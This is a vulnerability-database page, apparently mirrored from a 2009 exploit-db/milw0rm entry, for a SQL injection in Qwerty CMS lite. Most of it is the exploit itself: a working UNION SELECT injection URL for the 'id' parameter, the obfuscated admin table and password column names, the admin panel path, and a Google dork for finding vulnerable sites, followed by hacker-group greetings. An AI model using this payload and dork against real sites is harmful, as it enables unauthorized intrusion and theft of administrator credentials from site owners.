Qwerty CMS - 'id' SQL Injection

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1057484 漏洞类型
发布时间 2009-02-24 更新时间 2009-02-24
CVE编号 N/A CNNVD-ID N/A
漏洞平台 PHP CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/8104
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
QWERTY CMS lite - SQL INJ
Found: b3 from GraBBerZ.com
=
Injection in index.php variable: id
http://[site]/index.php?act=publ&id=-3+UNION+SELECT+1,2,3,4,5
=
Administrator Table: rkh8t5po
Columns: secret873ktlW,pass459khyf
Column with pass: pass459khyf
Admin CP: /admin/admin.php
=
CMS PAGE : http://web-sites.kiev.ua
GOOGLE DORK : allinurl:index.php?act=publ
Greetz: GraBBerZ, Antichat, XN, no respect all Turk =\

# milw0rm.com [2009-02-24]